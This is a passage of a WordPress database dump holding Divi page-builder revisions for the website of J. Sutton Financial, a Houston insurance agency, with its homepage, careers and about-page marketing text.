button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 20:13:03','2023-04-02 20:13:03','',138,'http://cmdev-site1.com/?p=650',0,'revision','',0),(667,3,'2023-04-03 12:26:21','2023-04-03 12:26:21','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" min_height=\"417.9px\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" custom_margin=\"|auto||27px||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-03 12:26:21','2023-04-03 12:26:21','',528,'http://cmdev-site1.com/?p=667',0,'revision','',0),(651,1,'2023-04-02 20:14:17','2023-04-02 20:14:17','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" title_text=\"j sutton logo white no background\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-02 20:14:17','2023-04-02 20:14:17','',528,'http://cmdev-site1.com/?p=651',0,'revision','',0),(660,3,'2023-04-03 12:00:29','2023-04-03 12:00:29','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-03 12:00:29','2023-04-03 12:00:29','',38,'http://cmdev-site1.com/?p=660',0,'revision','',0),(652,1,'2023-04-02 20:14:18','2023-04-02 20:14:18','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 20:14:18','2023-04-02 20:14:18','',38,'http://cmdev-site1.com/?p=652',0,'revision','',0),(653,3,'2023-04-02 20:16:24','2023-04-02 20:16:24','','Justin Conference 2 Cropped','','inherit','open','closed','','justin-conference-2-cropped','','','2023-04-02 20:16:24','2023-04-02 20:16:24','',0,'http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png',0,'attachment','image/png',0),(654,1,'2023-04-02 20:31:11','2023-04-02 20:31:11','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"Justin Conference 2 Cropped\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto||auto||\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Story\" color=\"#FFFFFF\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#FFFFFF\" header_font_size=\"30px\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"1px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. 